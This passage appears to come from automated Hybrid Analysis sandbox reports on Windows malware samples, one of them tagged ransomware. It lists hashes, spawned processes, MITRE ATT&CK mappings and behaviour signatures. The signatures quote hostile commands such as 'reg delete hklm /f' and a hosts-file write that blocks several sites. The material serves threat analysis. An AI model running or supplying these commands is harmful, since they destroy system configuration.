\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\TRACING\\RASAPI32\"; Key: \"CONSOLETRACINGMASK\"; Value: \"0000FFFF\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-115", "type": 9, "relevance": 10, "name": "Detected Rundll32 process execution", "description": "Process \"rundll32.exe\" with commandline \"user32.dll,UpdatePerUserSystemParameters\" (UID: 00000000-00005500)", "origin": "Monitored Target", "attck_id": "T1218.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/011"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"cmd.exe\"\n \"send@WS2_32.DLL\" in \"rundll32.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Network Related", "identifier": "api-32", "type": 6, "relevance": 10, "name": "Writes to the hosts file", "description": "\"9622b2eaad022298c21939a82dbf3fa814c46e90ac4f461949b21fad6d7bb6f2.exe\" wrote 79 bytes to file \"C:\\Windows\\System32\\drivers\\etc\\hosts\": 3132372e302e302e31207777772e646973636f72642e636f6d203132372e302e302e31207777772e676f6f676c652e636f6d203132372e302e302e31207777772e636c61737369637562652e636f6d", "origin": "API Call", "attck_id": "T1565", "attck_id_wiki": "https://attack.mitre.org/techniques/T1565"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Cryptographic Related", "identifier": "hooks-1", "type": 11, "relevance": 10, "name": "Hooks key cryptographic functions of the CryptoAPI", "description": "\"EncryptMessage@SSPICLI.DLL\" in \"rundll32.exe\"\n \"DecryptMessage@SSPICLI.DLL\" in \"rundll32.exe\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Security", "identifier": "target-24", "type": 9, "relevance": 5, "name": "Tries to delete registry keys using reg.exe", "description": "Process \"reg.exe\" with commandline \"reg delete \"HKCU\\\\Control Panel\\\\Desktop\" /V Wallpaper /f\" (UID: 00000000-00005004)\n Process \"reg.exe\" with commandline \"reg delete hklm /f\" (UID: 00000000-00005524)", "origin": "Monitored Target", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026
https://hybrid-analysis.com/sample/b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026
Hybrid Analysis - Ransomware
{"size": 605952, "type": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "submit_name": "b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026", "sha256": "b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026", "av_detect": 87, "vx_family": "Trojan.Generic", "threat_score": 85, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 3, "total_signatures": 163, "extracted_files": [{"name": "085cda53603755dc.exe", "file_path": "%TEMP%\\085cda53603755dc.exe", "file_size": 605956, "sha256": "cce6af2fa5e196a7ca6631b9fb5c24667afc6321a58e9eb0055e83f8945f2fc3", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows", "runtime_process": "085cda53603755dc.exe (PID: 2944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00002508", "name": "b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe", "normalized_path": "C:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe", "sha256": "b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026"}, {"uid": "00000000-00002944", "parentuid": "00000000-00002508", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": ":*C:\\b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe *", "sha256": "cce6af2fa5e196a7ca6631b9fb5c24667afc6321a58e9eb0055e83f8945f2fc3"}, {"uid": "00000000-00003000", "parentuid": "00000000-00002944", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZXQVVG", "sha256": "cce6af2fa5e196a7ca6631b9fb5c24667afc6321a58e9eb0055e83f8945f2fc3"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720a0000\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"KERNEL32\" at base 777a0000\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b240000\n \"b4b66aa6f8f2c5f8c7a6df70b5b6dd96356199e6b00066f8d6fb54c868d45026.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758c0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 758c0000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 75750000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 77a60000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76b10000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 75a30000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6fe60000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75c60000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 77760000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 720a0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 777a0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b240000\n 